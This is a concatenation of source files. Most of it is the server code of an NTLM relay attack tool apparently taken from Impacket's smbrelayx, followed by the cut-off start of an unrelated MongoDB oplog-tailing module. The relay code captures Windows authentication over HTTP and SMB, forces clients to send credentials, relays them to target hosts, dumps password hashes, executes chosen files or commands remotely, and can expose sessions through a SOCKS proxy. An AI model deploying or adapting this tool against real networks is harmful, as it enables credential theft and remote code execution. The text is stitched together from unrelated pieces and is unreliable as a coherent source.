http.server.SimpleHTTPRequestHandler.handle_one_request(self)
except Exception:
logging.debug("Exception:", exc_info=True)
pass
def log_message(self, format, *args):
return
def do_HEAD(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_AUTHHEAD(self, message = ''):
self.send_response(401)
self.send_header('WWW-Authenticate', message.decode('utf-8'))
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.end_headers()
def send_error(self, code, message=None):
if message.find('RPC_OUT') >=0 or message.find('RPC_IN'):
return self.do_GET()
return http.server.SimpleHTTPRequestHandler.send_error(self,code,message)
def do_GET(self):
messageType = 0
if PY2:
authorizationHeader = self.headers.getheader('Authorization')
else:
authorizationHeader = self.headers.get('Authorization')
if authorizationHeader is None:
self.do_AUTHHEAD(message = b'NTLM')
pass
else:
#self.do_AUTHHEAD()
typeX = authorizationHeader
try:
_, blob = typeX.split('NTLM')
token = base64.b64decode(blob.strip())
except:
self.do_AUTHHEAD()
messageType = unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 1:
if self.server.mode.upper() == 'REFLECTION':
self.target = self.client_address[0]
else:
self.target = self.server.target
try:
if self.client is not None:
logging.error('Still performing an attack against %s' % self.client.get_remote_host())
self.send_response(404)
self.end_headers()
return
self.client = SMBClient(self.target, extended_security = True)
self.client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
self.client.set_timeout(60)
except Exception as e:
logging.error("Connection against target %s FAILED" % self.target)
logging.error(str(e))
clientChallengeMessage = self.client.sendNegotiate(token)
self.challengeMessage = NTLMAuthChallenge()
self.challengeMessage.fromString(clientChallengeMessage)
self.do_AUTHHEAD(message = b'NTLM '+base64.b64encode(clientChallengeMessage))
elif messageType == 3:
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '' or self.target == '127.0.0.1':
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = token
clientResponse, errorCode = self.client.sendAuth(self.challengeMessage['challenge'],
respToken2.getData())
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials, except
# when coming from localhost
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
logging.error("Authenticating against %s as %s\\%s FAILED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
self.do_AUTHHEAD('NTLM')
else:
# Relay worked, do whatever we want here...
logging.info("Authenticating against %s as %s\\%s SUCCEED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
ntlm_hash_data = outputToJohnFormat(self.challengeMessage['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.outputFile is not None:
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.outputFile)
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible of removing it from the set
global ATTACKED_HOSTS
if self.target not in ATTACKED_HOSTS:
ATTACKED_HOSTS.add(self.target)
if self.server.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None,urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=self.client)
activeConnections.put(
(self.target, 445, 'SMB', ('%s/%s' % (
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper(),
protocolClient,
{'CHALLENGE_MESSAGE': self.challengeMessage}))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
else:
clientThread = doAttack(self.client,self.server.exeFile,self.server.command,self.server.raw)
self.client = None
clientThread.start()
else:
logging.error('%s is being attacker at the moment, skipping.. ' % self.target)
# And answer 404 not found
self.send_response(404)
self.send_header('WWW-Authenticate', 'NTLM')
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.end_headers()
return
def __init__(self, outputFile=None):
Thread.__init__(self)
self.daemon = True
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
self.exeFile = None
self.command = None
self.target = None
self.mode = None
self.outputFile = outputFile
self.one_shot = False
self.runSocks = False
def setTargets(self, target):
self.target = target
def setExeFile(self, filename):
self.exeFile = filename
def setCommand(self, command):
self.command = command
def setRaw(self, raw):
self.raw = raw
def setSocks(self, socks):
self.runSocks = socks
def setReturnStatus(self, returnStatus):
# Not implemented yet.
pass
def setMode(self,mode, one_shot):
self.mode = mode
self.one_shot = one_shot
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
def run(self):
logging.info("Setting up HTTP Server")
httpd = self.HTTPServer(("", 80), self.HTTPHandler, self.target, self.exeFile, self.command, self.mode,
self.outputFile, self.one_shot, runSocks = self.runSocks)
httpd.serve_forever()
class SMBRelayServer(Thread):
def __init__(self, outputFile = None):
Thread.__init__(self)
self.daemon = True
self.server = 0
self.target = ''
self.mode = 'REFLECTION'
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
self.exeFile = None
self.returnStatus = STATUS_SUCCESS
self.command = None
self.one_shot = False
self.runSocks = False
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','server_name')
smbConfig.set('global','server_os','UNIX')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global','log_file','smb.log')
smbConfig.set('global','credentials_file','')
if outputFile is not None:
smbConfig.set('global','jtr_dump_path',outputFile)
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path','')
self.server = SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)
self.server.processConfigFile()
self.origSmbComNegotiate = self.server.hookSmbCommand(SMB.SMB_COM_NEGOTIATE, self.SmbComNegotiate)
self.origSmbSessionSetupAndX = self.server.hookSmbCommand(SMB.SMB_COM_SESSION_SETUP_ANDX,
self.SmbSessionSetupAndX)
# Let's use the SMBServer Connection dictionary to keep track of our client connections as well
self.server.addConnection('SMBRelay', '0.0.0.0', 445)
def SmbComNegotiate(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
if self.mode.upper() == 'REFLECTION':
self.target = connData['ClientIP']
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
if self.target in smbData:
# Remove the previous connection and use the last one
smbClient = smbData[self.target]['SMBClient']
del smbClient
del smbData[self.target]
# Let's check if we already attacked this host.
global ATTACKED_HOSTS
if self.target in ATTACKED_HOSTS and self.one_shot is True:
logging.info("SMBD: Received connection from %s, skipping %s, already attacked" % (
connData['ClientIP'], self.target))
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY
packet['Flags2'] = SMB.FLAGS2_NT_STATUS
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
errorCode = STATUS_NOT_SUPPORTED
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
return None, [packet], STATUS_NOT_SUPPORTED
else:
logging.info("SMBD: Received connection from %s, attacking target %s" % (connData['ClientIP'] ,self.target))
try:
if recvPacket['Flags2'] & SMB.FLAGS2_EXTENDED_SECURITY == 0:
extSec = False
else:
if self.mode.upper() == 'REFLECTION':
# Force standard security when doing reflection
logging.info("Downgrading to standard security")
extSec = False
recvPacket['Flags2'] += (~SMB.FLAGS2_EXTENDED_SECURITY)
else:
extSec = True
client = SMBClient(self.target, extended_security = extSec)
client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
client.set_timeout(60)
except Exception as e:
logging.error("Connection against target %s FAILED" % self.target)
logging.error(str(e))
else:
encryptionKey = client.get_encryption_key()
smbData[self.target] = {}
smbData[self.target]['SMBClient'] = client
if encryptionKey is not None:
connData['EncryptionKey'] = encryptionKey
smbServer.setConnectionData('SMBRelay', smbData)
smbServer.setConnectionData(connId, connData)
return self.origSmbComNegotiate(connId, smbServer, SMBCommand, recvPacket)
#############################################################
def SmbSessionSetupAndX(self, connId, smbServer, smbCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
#############################################################
respSMBCommand = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
global ATTACKED_HOSTS
if connData['_dialects_parameters']['Capabilities'] & SMB.CAP_EXTENDED_SECURITY:
# Extended security. Here we deal with all SPNEGO stuff
respParameters = SMBSessionSetupAndX_Extended_Response_Parameters()
respData = SMBSessionSetupAndX_Extended_Response_Data()
sessionSetupParameters = SMBSessionSetupAndX_Extended_Parameters(smbCommand['Parameters'])
sessionSetupData = SMBSessionSetupAndX_Extended_Data()
sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength']
sessionSetupData.fromString(smbCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
if unpack('B',sessionSetupData['SecurityBlob'][0:1])[0] != ASN1_AID:
# If there no GSSAPI ID, it must be an AUTH packet
blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob'])
token = blob['ResponseToken']
else:
# NEGOTIATE packet
blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob'])
token = blob['MechToken']
# Here we only handle NTLMSSP, depending on what stage of the
# authentication we are, we act on it
messageType = unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 0x01:
# NEGOTIATE_MESSAGE
negotiateMessage = NTLMAuthNegotiate()
negotiateMessage.fromString(token)
# Let's store it in the connection data
connData['NEGOTIATE_MESSAGE'] = negotiateMessage
#############################################################
# SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client.
# Let's send it to the target server and send the answer back to the client.
# Let's check if we already attacked this host.
global ATTACKED_HOSTS
if self.target in ATTACKED_HOSTS and self.one_shot is True:
logging.info("SMBD: Received connection from %s, skipping %s, already attacked" % (
connData['ClientIP'], self.target))
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY
packet['Flags2'] = SMB.FLAGS2_NT_STATUS
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
errorCode = STATUS_NOT_SUPPORTED
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
return None, [packet], STATUS_NOT_SUPPORTED
# It might happen if the target connects back before a previous connection has finished, we might
# get to this function w/o having the dict and smbClient entry created, because a
# NEGOTIATE_CONNECTION was not needed
if (self.target in smbData) is False:
smbData[self.target] = {}
smbClient = SMBClient(self.target)
smbClient.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
smbClient.set_timeout(60)
smbData[self.target]['SMBClient'] = smbClient
smbClient = smbData[self.target]['SMBClient']
clientChallengeMessage = smbClient.sendNegotiate(token)
challengeMessage = NTLMAuthChallenge()
challengeMessage.fromString(clientChallengeMessage)
#############################################################
respToken = SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegResult'] = b'\x01'
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = challengeMessage.getData()
# Setting the packet to STATUS_MORE_PROCESSING
errorCode = STATUS_MORE_PROCESSING_REQUIRED
# Let's set up an UID for this connection and store it
# in the connection's data
# Picking a fixed value
# TODO: Manage more UIDs for the same session
connData['Uid'] = 10
# Let's store it in the connection data
connData['CHALLENGE_MESSAGE'] = challengeMessage
elif messageType == 0x03:
# AUTHENTICATE_MESSAGE, here we deal with authentication
#############################################################
# SMBRelay: Ok, so now the have the Auth token, let's send it
# back to the target system and hope for the best.
smbClient = smbData[self.target]['SMBClient']
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '':
clientResponse, errorCode = smbClient.sendAuth(connData['CHALLENGE_MESSAGE']['challenge'],
sessionSetupData['SecurityBlob'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY | SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
logging.error("Authenticating against %s as %s\\%s FAILED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
# del (smbData[self.target])
return None, [packet], errorCode
else:
# We have a session, create a thread and do whatever we want
logging.info("Authenticating against %s as %s\\%s SUCCEED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible of removing it from the set
ATTACKED_HOSTS.add(self.target)
if self.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None, urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=smbClient)
activeConnections.put((self.target, 445, 'SMB',
('%s/%s' % (
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper(),
protocolClient, connData))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
del (smbData[self.target])
else:
del (smbData[self.target])
clientThread = doAttack(smbClient,self.exeFile,self.command,self.raw)
clientThread.start()
# Now continue with the server
#############################################################
# Return status code of the authentication process.
errorCode = self.returnStatus
logging.info("Sending status code %s after authentication to %s" % (
ERROR_MESSAGES[self.returnStatus][0], connData['ClientIP']))
respToken = SPNEGO_NegTokenResp()
# accept-completed
respToken['NegResult'] = b'\x00'
# Status SUCCESS
# Let's store it in the connection data
connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
else:
raise Exception("Unknown NTLMSSP MessageType %d" % messageType)
respParameters['SecurityBlobLength'] = len(respToken)
respData['SecurityBlobLength'] = respParameters['SecurityBlobLength']
respData['SecurityBlob'] = respToken.getData()
else:
# Process Standard Security
respParameters = SMBSessionSetupAndXResponse_Parameters()
respData = SMBSessionSetupAndXResponse_Data()
sessionSetupParameters = SMBSessionSetupAndX_Parameters(smbCommand['Parameters'])
sessionSetupData = SMBSessionSetupAndX_Data()
sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength']
sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength']
sessionSetupData.fromString(smbCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
#############################################################
# SMBRelay
smbClient = smbData[self.target]['SMBClient']
if sessionSetupData['Account'] != '':
clientResponse, errorCode = smbClient.login_standard(sessionSetupData['Account'],
sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'],
sessionSetupData['UnicodePwd'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY | SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
return None, [packet], errorCode
# Now continue with the server
else:
# We have a session, create a thread and do whatever we want
ntlm_hash_data = outputToJohnFormat(b'', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible of removing it from the set
ATTACKED_HOSTS.add(self.target)
if self.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None, urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=smbClient)
activeConnections.put((self.target, 445, 'SMB',
('%s/%s' % (
sessionSetupData['PrimaryDomain'],
sessionSetupData['Account'])).upper(),
protocolClient, connData))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
# Remove the target server from our connection list, the work is done
del (smbData[self.target])
else:
# Remove the target server from our connection list, the work is done
del (smbData[self.target])
clientThread = doAttack(smbClient, self.exeFile, self.command, self.raw)
clientThread.start()
# Now continue with the server
#############################################################
# Do the verification here, for just now we grant access
# TODO: Manage more UIDs for the same session
errorCode = self.returnStatus
logging.info("Sending status code %s after authentication to %s" % (
ERROR_MESSAGES[self.returnStatus][0], connData['ClientIP']))
connData['Uid'] = 10
respParameters['Action'] = 0
respData['NativeOS'] = smbServer.getServerOS()
respData['NativeLanMan'] = smbServer.getServerOS()
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
# From now on, the client can ask for other commands
connData['Authenticated'] = True
#############################################################
# SMBRelay
smbServer.setConnectionData('SMBRelay', smbData)
#############################################################
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def _start(self):
self.server.serve_forever()
def run(self):
logging.info("Setting up SMB Server")
self._start()
def setTargets(self, targets):
self.target = targets
def setExeFile(self, filename):
self.exeFile = filename
def setCommand(self, command):
self.command = command
def setRaw(self, raw):
self.raw = raw
def setSocks(self, socks):
self.runSocks = socks
def setReturnStatus(self, returnStatus):
# Specifies return status after successful relayed authentication to return
# to the connecting client. This comes useful when we don't want the connecting
# client to store successful credentials in his memory. Valid statuses:
# STATUS_SUCCESS - denotes that the connecting client passed valid credentials,
# which will make him store them accordingly.
# STATUS_ACCESS_DENIED - may occur for instance when the client is not a Domain Admin,
# and got configured Remote UAC, thus preventing connection to ADMIN$
# STATUS_LOGON_FAILURE - which will tell the connecting client that the passed credentials
# are invalid.
self.returnStatus = {
'success' : STATUS_SUCCESS,
'denied' : STATUS_ACCESS_DENIED,
'logon_failure' : STATUS_LOGON_FAILURE
}[returnStatus.lower()]
def setMode(self,mode, one_shot):
self.mode = mode
self.one_shot = one_shot
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
# Process command-line arguments.
if __name__ == '__main__':
RELAY_SERVERS = ( SMBRelayServer, HTTPRelayServer )
# Init the example's logger theme
logger.init()
print(version.BANNER)
parser = argparse.ArgumentParser(add_help=False,
description="For every connection received, this module will try to SMB relay that "
" connection to the target system or the original client")
parser.add_argument("--help", action="help", help='show this help message and exit')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-h', action='store', metavar='HOST',
help='Host to relay the credentials to, if not it will relay it back to the client')
parser.add_argument('-s', action='store', choices={'success', 'denied', 'logon_failure'}, default='success',
help='Status to return after client performed authentication. Default: "success".')
parser.add_argument('-e', action='store', required=False, metavar='FILE',
help='File to execute on the target system. If not specified, hashes will be dumped '
'(secretsdump.py must be in the same directory)')
parser.add_argument('-c', action='store', type=str, required=False, metavar='COMMAND',
help='Command to execute on target system. If not specified, hashes will be dumped '
'(secretsdump.py must be in the same directory)')
parser.add_argument('-socks', action='store_true', default=False,
help='Launch a SOCKS proxy for the connection relayed')
parser.add_argument('-one-shot', action='store_true', default=False,
help='After successful authentication, only execute the attack once for each target')
parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default '
'"%s"). If errors are detected, run chcp.com at the target, '
'map the result with '
'https://docs.python.org/2.4/lib/standard-encodings.html and then execute wmiexec.py '
'again with -codec and the corresponding codec ' % CODEC)
parser.add_argument('-outputfile', action='store',
help='base output filename for encrypted hashes. Suffixes will be added for ntlm and ntlmv2')
parser.add_argument('-machine-account', action='store', required=False,
help='Domain machine account to use when interacting with the domain to grab a session key for '
'signing, format is domain/machine_name')
parser.add_argument('-machine-hashes', action="store", metavar="LMHASH:NTHASH",
help='Domain machine hashes, format is LMHASH:NTHASH')
parser.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
try:
options = parser.parse_args()
except Exception as e:
logging.error(str(e))
sys.exit(1)
if options.codec is not None:
CODEC = options.codec
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
if options.h is not None:
logging.info("Running in relay mode")
mode = 'RELAY'
targetSystem = options.h
else:
logging.info("Running in reflection mode")
targetSystem = None
mode = 'REFLECTION'
exeFile = options.e
Command = options.c
returnStatus = options.s
threads = set()
if options.socks is True:
# Start a SOCKS proxy in the background
s1 = SOCKS()
socks_thread = Thread(target=s1.serve_forever)
socks_thread.daemon = True
socks_thread.start()
threads.add(socks_thread)
for server in RELAY_SERVERS:
s = server(options.outputfile)
s.setTargets(targetSystem)
s.setExeFile(exeFile)
s.setCommand(Command)
s.setSocks(options.socks)
s.setReturnStatus(returnStatus)
s.setMode(mode, options.one_shot)
if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None:
s.setDomainAccount( options.machine_account, options.machine_hashes, options.domain)
elif (options.machine_account is None and options.machine_hashes is None and options.domain is None) is False:
logging.error("You must specify machine-account/hashes/domain all together!")
sys.exit(1)
s.start()
threads.add(s)
print("")
logging.info("Servers started, waiting for connections")
while True:
try:
sys.stdin.read()
except KeyboardInterrupt:
logging.info('Quitting.. please wait')
if options.socks is True:
s1.shutdown()
for s in threads:
del(s)
sys.exit(1)
else:
pass
|
oplog_manager.py
|
# Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tails the oplog of a shard and returns entries
"""
import bson
import logging
try:
import Queue as queue
except ImportError:
import queue
import pymongo
import sys
import time
import threading
from mongo_connector import errors, util
from mongo_connector.constants import DEFAULT_BATCH_SIZE
from mongo_connector.gridfs_file import GridFSFile
from mongo_connector.util import log_fatal_exceptions, retry_until_ok
LOG = logging.getLogger(__name__)
class OplogThread(threading.Thread):
"""Thread that tails an oplog.
Calls the appropriate method on DocManagers for each relevant oplog entry.
"""
def __init__(self, primary_client, doc_managers,
oplog_progress_dict, mongos_client=None, **kwargs):
super(OplogThread, self).__init__()
self.batch_size = kwargs.get('batch_size', DEFAULT_BATCH_SIZE)
# The connection to the primary for this replicaSet.
self.primary_client = primary_client
# The connection to the mongos, if there is one.
self.mongos_client = mongos_client
# Are we allowed to perform a collection dump?
self.collection_dump = kwargs.get('collection_dump', True)
# The document manager for each target system.
# These are the same for all threads.
self.doc_managers = doc_managers
# Boolean describing whether or not the thread is running.
self.running = True
# Stores the timestamp of the last oplog entry read.
self.checkpoint = None
# A dictionary that stores OplogThread/timestamp pairs.
# Represents the last checkpoint for a OplogThread.
self.oplog_progress = oplog_progress_dict
# The set of namespaces to process from the mongo cluster.
self.namespace_set = kwargs.get('ns_set', [])
# The set of gridfs namespaces to process from the mongo cluster
self.gridfs_set = kwargs.get('gridfs_set', [])
# The dict of source namespaces to destination namespaces
self.dest_mapping = kwargs.get('dest_mapping', {})
# Whether the collection dump gracefully handles exceptions
self.continue_on_error = kwargs.get('continue_on_error', False)
# Set of fields to export
self.fields = kwargs.get('fields', [])
LOG.info('OplogThread: Initializing oplog thread')
self.oplog = self.primary_client.local.oplog.rs
if not self.oplog.find_one():
err_msg = 'OplogThread: No oplog for thread:'
LOG.warning('%s %s' % (err_msg, self.primary_connection))
@property
def fields(self):
return self._fields
@fields.setter
def fields(self, value):
if value:
self._fields = set(value)
# Always include _id field
self._fields.add('_id')
else:
self._fields = None
@property
def namespace_set(self):
return self._namespace_set
@namespace_set.setter
def namespace_set(self, namespace_set):
self._namespace_set = namespace_set
self.update_oplog_ns_set()
@property
def gridfs_set(self):
return self._gridfs_set
@gridfs_set.setter
def gridfs_set(self, gridfs_set):
self._gridfs_set = gridfs_set
self._gridfs_files_set = [ns + '.files' for ns in gridfs_set]
self.update_oplog_ns_set()
@property
def gridfs_files_set(self):
try:
return self._gridfs_files_set
except AttributeError:
return []
@property
def oplog_ns_set(self):
try:
return self._oplog_ns_set
except AttributeError:
return []
def update_oplog_ns_set(self):
self._oplog_ns_set = []
if self.namespace_set:
self._oplog_ns_set.extend(self.namespace_set)
self._oplog_ns_set.extend(self.gridfs_files_set)
self._oplog_ns_set.extend(set(
ns.split('.', 1)[0] + '.$cmd' for ns in self.namespace_set))
self._oplog_ns_set.append("admin.$cmd")
@log_fatal_exceptions
def run(self):
"""Start the oplog worker.
"""
LOG.debug("OplogThread: Run thread started")
while self.running is True:
LOG.debug("OplogThread: Getting cursor")
cursor, cursor_len = self.init_cursor()
# we've fallen too far behind
if cursor is None and self.checkpoint is not None:
err_msg = "OplogThread: Last entry no longer in oplog"
effect = "cannot recover!"
LOG.error('%s %s %s' % (err_msg, effect, self.oplog))
self.running = False
continue
if cursor_len == 0:
LOG.debug("OplogThread: Last entry is the one we "
"already processed. Up to date. Sleeping.")
time.sleep(1)
continue
LOG.debug("OplogThread: Got the cursor, count is %d"
% cursor_len)
last_ts = None
remove_inc = 0
upsert_inc = 0
update_inc = 0
try:
LOG.debug("OplogThread: about to process new oplog "
"entries")
while cursor.alive and self.running:
LOG.debug("OplogThread: Cursor is still"
" alive and thread is still running.")
for n, entry in enumerate(cursor):
LOG.debug("OplogThread: Iterating through cursor,"
" document number in this cursor is %d"
% n)
# Break out if this thread should stop
if not self.running:
break
# Don't replicate entries resulting from chunk moves
if entry.get("fromMigrate"):
continue
# Take fields out of the oplog entry that
# shouldn't be replicated. This may nullify
# the document if there's nothing to do.
if not self.filter_oplog_entry(entry):
continue
#sync the current oplog operation
operation = entry['op']
ns = entry['ns']
if '.' not in ns:
continue
coll = ns.split('.', 1)[1]
# Ignore system collections
if coll.startswith("system."):
continue
# Ignore GridFS chunks
if coll.endswith('.chunks'):
continue
is_gridfs_file = False
if coll.endswith(".files"):
if ns in self.gridfs_files_set:
ns = ns[:-len(".files")]
is_gridfs_file = True
else:
continue
# use namespace mapping if one exists
ns = self.dest_mapping.get(ns, ns)
timestamp = util.bson_ts_to_long(entry['ts'])
for docman in self.doc_managers:
try:
LOG.debug("OplogThread: Operation for this "
"entry is %s" % str(operation))
# Remove
if operation == 'd':
docman.remove(
entry['o']['_id'], ns, timestamp)
remove_inc += 1
# Insert
elif operation == 'i': # Insert
# Retrieve inserted document from
# 'o' field in oplog record
doc = entry.get('o')
# Extract timestamp and namespace
if is_gridfs_file:
db, coll = ns.split('.', 1)
gridfile = GridFSFile(
self.primary_client[db][coll],
doc)
docman.insert_file(
gridfile, ns, timestamp)
else:
docman.upsert(doc, ns, timestamp)
upsert_inc += 1
# Update
elif operation == 'u':
docman.update(entry['o2']['_id'],
entry['o'],
ns, timestamp)
update_inc += 1
# Command
elif operation == 'c':
# use unmapped namespace
doc = entry.get('o')
docman.handle_command(doc,
entry['ns'],
timestamp)
except errors.OperationFailed:
LOG.exception(
"Unable to process oplog document %r"
% entry)
except errors.ConnectionFailed:
LOG.exception(
"Connection failed while processing oplog "
"document %r" % entry)
if (remove_inc + upsert_inc + update_inc) % 1000 == 0:
LOG.debug(
"OplogThread: Documents removed: %d, "
"inserted: %d, updated: %d so far" % (
remove_inc, upsert_inc, update_inc))
LOG.debug("OplogThread: Doc is processed.")
last_ts = entry['ts']
# update timestamp per batch size
# n % -1 (default for self.batch_size) == 0 for all n
if n % self.batch_size == 1 and last_ts is not None:
self.checkpoint = last_ts
self.update_checkpoint()
# update timestamp after running through oplog
if last_ts is not None:
LOG.debug("OplogThread: updating checkpoint after"
"processing new oplog entries")
self.checkpoint = last_ts
self.update_checkpoint()
except (pymongo.errors.AutoReconnect,
pymongo.errors.OperationFailure,
pymongo.errors.ConfigurationError):
